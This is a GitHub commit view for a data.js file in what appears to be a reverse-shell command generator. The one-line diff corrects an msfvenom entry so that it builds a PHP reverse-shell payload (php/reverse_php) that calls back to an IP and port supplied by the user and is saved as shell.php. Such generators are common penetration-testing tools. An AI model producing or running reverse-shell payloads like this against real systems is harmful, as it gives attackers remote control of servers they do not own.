Update data.js

Fixed reverse_php in MSFVenom Generator
This commit is contained in:
Ryan Montgomery 2021-04-09 18:51:35 -04:00 committed by GitHub
parent 5b0dac992f
commit 0bb4509882
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -312,7 +312,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "PHP Reverse PHP",
"command": "msfvenom -p php/reverse_tcp LHOST={ip} LPORT={port} -o shell.php",
"command": "msfvenom -p php/reverse_php LHOST={ip} LPORT={port} -o shell.php",
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
},
{